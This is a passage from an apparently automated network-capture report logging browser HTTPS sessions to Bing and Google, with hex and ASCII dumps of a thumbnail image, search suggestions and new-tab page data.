c5 25 cb 12 d0 4a bf 24 c7 af e1 f8 d7 68 a6 e7 cb 89 e7 6f 33 77 ca bb 7e 5d b5 5f 5a bc 96 05 8c 16 56 b8 59 37 ee dd b5 54 Data Ascii: 6\|F8m~5sO3WKlA/'_V4m.k-I\|`Wozbs)%$Z&zb&$ >^-^q$d2vjKm>MPya_CVqf8XNeo$\{"3^c/uKCvq%J$ho3w~]_ZVY7T
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 26 28 2c ed e4 91 a1 82 2f 3e 37 f3 01 fb ad 85 3c 67 d3 35 89 f1 13 57 8b 4e 99 4d a7 cd e5 c6 de 7a ed f9 24 dc 7a 91 fd 2b 5a 77 92 57 67 0e 2e 9d 93 ba 32 34 9b 0b 97 56 b8 92 da 0b 66 58 d7 6c 71 e3 cb d8 dd 19 71 f7 4f a8 ad 4d 40 dd bb 3a 25 b4 0c ab 2f cd b5 42 a6 15 3a 9f 56 27 f8 6a b7 86 3c 45 6b 7f 6f f6 78 a7 8f 2a ab e6 37 f0 29 1d bf fd 55 06 97 0d c7 f6 a6 a7 3d a4 f7 d2 c9 15 eb 24 51 79 7e 66 d8 d4 fc ec 07 ae 4f 15 a4 9b 84 76 27 0f 15 24 b9 4c ad 2f 54 16 ba f2 ca 8b 1c 72 41 21 32 6d ca b6 4f ae 7b 57 a2 be ad 11 b3 57 8e 55 8d 56 03 27 ca c3 6e 4f bf 6e 2b cc 9b 4d 13 46 d7 93 c1 3c 57 11 c8 5d a4 dd f2 c9 ea d8 fd 3b 55 3b 78 75 dd 6b c4 cb 10 d3 da 4b 65 89 83 79 19 55 62 a3 80 03 10 3f fa dc d7 9d 2c 3d 57 1b 5c f4 e8 d6 8c 53 be Data Ascii: &(,/>7<g5WNMz$z+ZwWg.24VfXlqqOM@:%/B:V'j<Ekox*7)U=$Qy~fOv'$L/TrA!2mO{WWUV'nOn+MF<W];U;xukKeyUb?,=W\S
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 38 00 fb 9e be d5 ca 5e 24 76 32 5c c5 0b 79 ab 1c a7 ca 66 fb db 33 f2 9f c2 b5 56 e2 e3 55 b3 d3 6d ac d9 60 99 64 3b be 6f bd d8 e7 b7 e1 55 ee 74 6b c8 35 69 60 92 09 24 56 57 f3 16 5f 97 77 d0 8e 0d 6f 0b a4 63 52 d2 2a df b0 31 c1 25 c2 b6 36 e7 72 fc dd 3d 6a 45 08 de 51 9d 99 44 8c 1e 46 fe e8 3f fd 6a 83 58 8a 48 74 d8 23 ff 00 58 65 52 76 b7 dd 5f 6f ca a0 b1 57 9b 74 62 56 6d aa 36 ff 00 b3 eb 4e 73 48 9a 74 db 65 bb a6 8e 5f 90 4a d9 56 3b 5b 6f cd c7 4a bd 63 1c b2 59 c4 f3 cb ce dc 7c be 95 0d ad b2 24 9c ed 69 1b f8 aa fe 26 8a d6 39 63 89 55 57 f8 bf 87 8a e5 55 1c dd 8e df ab c6 0a ed 96 2d 65 36 32 47 be 7f 29 5a 4f f9 66 bf eb 07 5e 9d cd 67 de 5e 49 23 62 35 f3 3a 95 db f3 32 8c f5 ac bd 6f 55 4b cb c8 e2 85 59 bc b6 d8 d2 2f dd 6c ff Data Ascii: 8^$v2\yf3VUm`d;oUtk5i`$VW_wocR*1%6r=jEQDF?jXHt#XeRv_oWtbVm6NsHte_JV;[oJcY\|$i&9cUWU-e62G)ZOf^g^I#b5:2oUKY/l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49719	23.206.197.17	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:20 UTC	367	OUT	GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive
2024-12-07 09:51:21 UTC	627	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Type: image/png Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Content-Length: 1874 Date: Sat, 07 Dec 2024 09:51:21 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.2cc5ce17.1733565081.94044e7
2024-12-07 09:51:21 UTC	1874	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 06 e7 49 44 41 54 48 4b 95 93 0b 54 93 e7 19 c7 3f 2e 81 90 1b b7 ba a3 67 dd 7a a6 75 a7 83 40 88 dc ca aa d4 1d 94 02 02 81 90 ac 5e d0 8e e3 8e 5d 2f 93 22 0c 08 01 af 08 a2 a0 20 a2 50 44 ec 9c 73 dd d9 dc ea ac 68 5b 35 17 92 70 27 5c 12 12 42 a2 dc aa 88 a8 79 9f 8f 90 48 4b f6 26 fb 8e eb d6 d9 6d bf 73 fe e7 3b 39 e7 7d fe bf ef 79 bf 13 e2 bb 58 ad 34 ae e4 ca 47 8b b9 72 e3 17 5c b9 6e 3c 44 31 f0 24 44 d9 83 a3 9a 0c 51 de 54 87 2a db 8e 87 2a ff b2 9e f8 a3 d8 8b 1a f9 df e0 7d 31 f1 fd 08 d9 Data Ascii: PNGIHDRw=sRGBgAMAapHYsodIDATHKT?.gzu@^]/" PDsh[5p'\ByHK&ms;9}yX4Gr\n<D1$DQT**}1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49726	142.250.181.68	443	3200	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:22 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-07 09:51:23 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:22 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Oq1SF95akw1g58YVPen8vQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-07 09:51:23 UTC	124	IN	Data Raw: 63 64 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 61 6c 61 6e 74 69 72 20 73 74 6f 63 6b 73 22 2c 22 6e 62 61 20 6c 61 6b 65 72 73 22 2c 22 73 6f 6c 6f 20 6c 65 76 65 6c 69 6e 67 20 72 65 61 77 61 6b 65 6e 69 6e 67 20 6d 6f 76 69 65 22 2c 22 68 61 75 6e 74 65 64 20 63 68 6f 63 6f 6c 61 74 69 65 72 22 2c 22 24 32 35 20 66 6c 69 67 68 74 73 20 61 6d 61 7a 6f 6e 20 70 72 Data Ascii: cda)]}'["",["palantir stocks","nba lakers","solo leveling reawakening movie","haunted chocolatier","$25 flights amazon pr
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 69 6d 65 22 2c 22 69 72 6f 6e 6d 61 6e 20 74 6f 75 72 6e 61 6d 65 6e 74 22 2c 22 32 30 32 35 20 70 65 61 72 6c 20 6a 61 6d 20 74 6f 75 72 20 64 61 74 65 73 22 2c 22 73 74 6f 72 6d 20 64 61 72 72 61 67 68 20 77 65 61 74 68 65 72 20 77 61 72 6e 69 6e 67 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a Data Ascii: ime","ironman tournament","2025 pearl jam tour dates","storm darragh weather warnings"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"z
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 48 52 46 6b 30 4e 47 68 43 52 53 39 31 52 79 39 33 52 6c 6c 52 51 6b 73 76 4f 47 39 32 51 54 55 35 4d 7a 4a 54 53 6d 70 61 54 30 4e 6f 64 48 67 77 55 31 42 4f 54 55 55 7a 4f 57 46 51 64 32 70 4d 52 32 64 47 4d 56 68 4b 61 45 74 33 4e 44 4a 68 4f 58 4e 4c 57 58 42 59 63 57 6c 6c 4f 58 68 76 62 6e 52 6c 53 6a 4a 35 53 47 56 6f 52 31 4e 4e 52 48 42 59 4d 6e 41 78 62 55 35 42 4d 6d 4a 51 4e 57 35 57 54 30 5a 42 52 6c 6c 55 59 54 4e 5a 62 6c 64 55 62 30 4a 77 57 55 30 30 4d 56 5a 47 54 54 56 34 64 44 56 4a 62 54 4e 68 61 57 5a 53 52 7a 42 73 56 31 56 55 4e 6d 64 30 55 45 5a 36 63 55 74 54 4c 32 4a 35 54 57 68 6b 4d 31 6c 44 64 46 52 5a 61 58 56 6a 57 44 6b 32 55 56 46 74 4e 58 46 6c 59 32 35 42 63 30 74 61 62 7a 52 35 4d 47 6c 68 61 46 68 5a 55 33 42 72 62 45 Data Ascii: HRFk0NGhCRS91Ry93RllRQksvOG92QTU5MzJTSmpaT0NodHgwU1BOTUUzOWFQd2pMR2dGMVhKaEt3NDJhOXNLWXBYcWllOXhvbnRlSjJ5SGVoR1NNRHBYMnAxbU5BMmJQNW5WT0ZBRllUYTNZbldUb0JwWU00MVZGTTV4dDVJbTNhaWZSRzBsV1VUNmd0UEZ6cUtTL2J5TWhkM1lDdFRZaXVjWDk2UVFtNXFlY25Bc0tabzR5MGlhaFhZU3BrbE
2024-12-07 09:51:23 UTC	393	IN	Data Raw: 47 73 72 54 33 68 43 4d 6a 59 72 61 57 56 32 61 6e 6c 34 56 31 4a 35 5a 45 52 52 4e 57 5a 75 4c 7a 52 33 54 6a 4e 59 55 30 56 68 61 6a 42 53 5a 55 52 30 4e 44 45 76 51 55 68 42 55 57 56 49 57 46 64 77 4f 46 5a 54 51 55 46 42 51 55 46 46 62 45 5a 55 61 31 4e 31 55 57 31 44 51 7a 6f 4b 62 6d 4a 68 49 47 78 68 61 32 56 79 63 30 6f 48 49 7a 6b 35 4e 6d 59 78 4f 46 49 79 5a 33 4e 66 63 33 4e 77 50 57 56 4b 65 6d 6f 30 64 45 52 51 4d 56 52 6d 53 58 6c 7a 4d 44 4a 4f 4d 6b 51 77 4e 48 4e 77 54 46 4e 73 56 45 6c 54 59 33 68 50 54 46 4e 76 52 30 46 46 62 48 42 43 64 44 68 77 42 77 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 30 76 5a 79 38 78 4d 58 64 6d 61 7a Data Ascii: GsrT3hCMjYraWV2anl4V1J5ZERRNWZuLzR3TjNYU0VhajBSZUR0NDEvQUhBUWVIWFdwOFZTQUFBQUFFbEZUa1N1UW1DQzoKbmJhIGxha2Vyc0oHIzk5NmYxOFIyZ3Nfc3NwPWVKemo0dERQMVRmSXlzMDJOMkQwNHNwTFNsVElTY3hPTFNvR0FFbHBCdDhwBw\u003d\u003d","zl":10002},{"google:entityinfo":"Cg0vZy8xMXdmaz
2024-12-07 09:51:23 UTC	91	IN	Data Raw: 35 35 0d 0a 4a 33 51 30 56 42 51 57 74 48 51 6e 64 6e 53 45 4a 6e 61 30 6c 43 64 32 64 4c 51 32 64 72 54 45 52 53 57 56 42 45 55 58 64 4e 52 46 4a 7a 56 55 5a 53 51 56 64 4a 51 6a 42 70 53 57 6c 42 5a 45 68 34 4f 47 74 4c 52 46 46 7a 53 6b 4e 5a 65 45 70 34 4f 47 5a 0d 0a Data Ascii: 55J3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZ
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 31 66 38 63 0d 0a 4d 56 44 42 30 54 56 52 56 4d 30 39 71 62 7a 5a 4a 65 58 4d 76 55 6b 51 34 4e 46 46 36 55 54 56 50 61 6d 4e 43 51 32 64 76 53 30 52 52 64 30 35 48 5a 7a 68 51 52 32 70 6a 62 45 68 35 56 54 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 69 38 76 51 55 46 43 52 55 6c 42 52 55 46 42 55 55 46 4e 51 6b 56 52 51 55 4e 46 55 55 56 45 52 56 46 49 4c 33 68 42 51 57 4e 42 51 55 46 43 51 6c 46 46 51 6b 46 52 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 56 42 5a 30 31 47 51 6d 64 6a 51 6b 4e 42 52 43 39 34 51 55 45 79 52 55 46 42 Data Ascii: 1f8cMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQkVRQUNFUUVERVFIL3hBQWNBQUFCQlFFQkFRQUFBQUFBQUFBQUFBQUVBZ01GQmdjQkNBRC94QUEyRUFB
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 6b 63 6d 31 33 4e 44 4e 30 4f 57 56 6a 52 45 31 52 52 6a 59 78 52 47 64 76 53 47 31 4a 63 32 56 30 56 46 4a 7a 64 6a 5a 69 65 6d 46 31 63 48 5a 46 63 58 46 48 5a 45 74 61 56 57 74 53 52 57 6f 34 63 45 56 70 61 54 46 70 62 30 4a 50 61 33 5a 6a 59 6c 63 30 4e 54 52 32 52 47 46 42 57 48 59 34 51 58 67 34 65 58 4a 4f 62 58 6c 4f 55 7a 64 45 4e 44 46 74 5a 6a 6c 52 4d 48 49 31 5a 6d 31 73 57 46 4a 7a 53 46 5a 78 59 56 5a 76 56 47 5a 68 4e 46 55 79 4b 79 39 51 4d 58 68 56 52 6b 4a 34 4f 44 41 31 65 6a 46 36 56 55 70 49 65 46 5a 55 53 55 35 45 52 6d 31 52 4e 30 5a 54 4d 32 78 30 4f 48 4e 4b 56 56 70 4e 63 6b 78 77 64 44 49 79 62 6d 46 75 56 54 42 6a 59 33 70 6f 57 6d 38 30 64 30 55 7a 4d 6c 42 6c 4d 6e 49 33 52 44 5a 45 61 6b 64 35 56 6a 42 48 61 7a 42 4d 4f 44 Data Ascii: kcm13NDN0OWVjRE1RRjYxRGdvSG1Jc2V0VFJzdjZiemF1cHZFcXFHZEtaVWtSRWo4cEVpaTFpb0JPa3ZjYlc0NTR2RGFBWHY4QXg4eXJObXlOUzdENDFtZjlRMHI1Zm1sWFJzSFZxYVZvVGZhNFUyKy9QMXhVRkJ4ODA1ejF6VUpIeFZUSU5ERm1RN0ZTM2x0OHNKVVpNckxwdDIybmFuVTBjY3poWm80d0UzMlBlMnI3RDZEakd5VjBHazBMOD
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 44 56 71 4b 33 4e 43 4d 30 6f 35 59 31 70 72 4d 30 4a 50 4e 31 49 33 64 48 55 7a 57 6d 59 78 65 47 39 74 55 48 5a 43 4d 57 6f 35 53 47 78 7a 4d 56 6c 56 52 57 4a 4a 54 6d 52 35 54 6c 4a 30 57 55 52 72 62 6a 49 72 56 6a 64 6b 4e 31 6c 6b 4f 47 39 59 63 6b 74 7a 55 45 52 51 62 45 6c 44 4e 33 70 55 4c 30 46 4f 61 30 30 77 4e 32 70 50 54 32 31 76 57 47 56 77 62 32 46 70 51 58 56 61 55 55 78 4d 52 6b 74 6d 54 48 51 33 54 55 77 33 4c 33 64 45 52 56 6c 73 5a 6b 70 35 64 58 56 56 4e 6b 56 55 56 6d 74 34 5a 30 5a 46 59 54 59 7a 4d 69 39 49 4d 7a 68 54 59 33 70 79 54 33 46 68 61 6d 4a 78 53 30 74 31 63 30 74 6c 63 6e 45 35 52 69 74 6b 55 47 68 4e 64 30 5a 6f 4e 6a 64 4d 4c 31 45 30 63 58 6c 71 62 48 67 30 51 32 67 78 51 54 6b 30 5a 55 56 33 62 31 64 69 53 6d 31 4f Data Ascii: DVqK3NCM0o5Y1prM0JPN1I3dHUzWmYxeG9tUHZCMWo5SGxzMVlVRWJJTmR5TlJ0WURrbjIrVjdkN1lkOG9YcktzUERQbElDN3pUL0FOa00wN2pPT21vWGVwb2FpQXVaUUxMRktmTHQ3TUw3L3dERVlsZkp5dXVVNkVUVmt4Z0ZFYTYzMi9IMzhTY3pyT3FhamJxS0t1c0tlcnE5RitkUGhNd0ZoNjdML1E0cXlqbHg0Q2gxQTk0ZUV3b1diSm1O
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 7a 4e 4f 4c 79 39 42 51 55 4a 46 53 55 46 44 5a 30 46 52 51 55 31 43 52 56 46 42 51 30 56 52 52 55 52 46 55 55 67 76 65 45 46 42 59 55 46 42 51 55 4e 42 64 30 56 43 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 52 55 4a 52 54 55 64 43 64 30 6c 43 4c 7a 68 52 51 55 78 6f 51 55 46 42 55 56 46 43 51 58 64 4a 52 6b 4a 42 52 55 5a 42 55 55 46 42 51 55 46 42 51 55 46 52 53 55 52 43 51 56 56 53 51 6d 68 4a 61 45 46 45 52 55 68 46 65 55 70 43 57 56 4a 52 65 56 56 59 52 56 5a 52 62 6b 74 43 61 32 46 46 56 79 38 34 55 55 46 48 55 55 56 42 51 57 64 4e 51 6b 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 55 55 31 42 51 57 64 52 52 69 38 34 55 55 46 4e 61 45 56 42 51 57 64 46 52 45 46 6e 54 55 64 42 64 32 64 45 51 55 46 42 51 55 46 42 Data Ascii: zNOLy9BQUJFSUFDZ0FRQU1CRVFBQ0VRRURFUUgveEFBYUFBQUNBd0VCQUFBQUFBQUFBQUFBQUFBRUJRTUdCd0lCLzhRQUxoQUFBUVFCQXdJRkJBRUZBUUFBQUFBQUFRSURCQVVSQmhJaEFERUhFeUpCWVJReVVYRVZRbktCa2FFVy84UUFHUUVBQWdNQkFBQUFBQUFBQUFBQUFBQUFBUU1BQWdRRi84UUFNaEVBQWdFREFnTUdBd2dEQUFBQUFB
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 31 64 33 45 72 4e 46 45 72 65 6b 6c 79 55 45 31 4c 62 57 31 59 62 58 68 31 51 7a 4a 33 5a 6e 51 72 4d 56 46 4a 52 30 46 52 55 6e 68 72 5a 47 46 68 55 6d 4e 4e 65 55 39 6a 4e 44 68 5a 64 48 64 31 4e 6e 63 76 57 48 56 76 62 33 52 61 63 57 56 73 57 6e 52 49 52 30 6c 6a 53 30 56 79 4e 6a 52 35 53 47 78 4c 53 6d 56 4b 55 54 59 78 4e 57 4a 68 55 57 73 31 53 54 4e 42 61 32 74 71 52 31 4a 34 4d 55 78 71 53 6c 52 6f 51 55 39 55 53 6c 52 55 61 55 38 34 63 44 68 79 56 6a 42 44 65 6c 4a 79 56 33 5a 70 4d 30 52 72 65 43 73 77 52 46 52 57 56 7a 45 32 61 55 68 42 64 45 46 49 62 47 39 49 63 32 4e 78 53 56 42 69 63 45 4e 56 65 58 42 77 62 6d 68 34 61 6b 39 6c 57 47 35 48 63 30 4e 52 55 6d 74 68 5a 47 4d 30 4d 33 4e 69 64 58 4a 6b 63 7a 64 74 63 33 4a 35 4d 6e 70 50 63 6c Data Ascii: 1d3ErNFEreklyUE1LbW1YbXh1QzJ3ZnQrMVFJR0FRUnhrZGFhUmNNeU9jNDhZdHd1NncvWHVvb3RacWVsWnRIR0ljS0VyNjR5SGxLSmVKUTYxNWJhUWs1STNBa2tqR1J4MUxqSlRoQU9USlRUaU84cDhyVjBDelJyV3ZpM0RreCswRFRWVzE2aUhBdEFIbG9Ic2NxSVBicENVeXBwbmh4ak9lWG5Hc0NRUmthZGM0M3NidXJkczdtc3J5MnpPcl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49725	142.250.181.68	443	3200	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:22 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49724	142.250.181.68	443	3200	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:22 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-07 09:51:23 UTC	1018	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 07 Dec 2024 09:51:22 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-07 09:51:23 UTC	372	IN	Data Raw: 32 35 30 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 250d)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
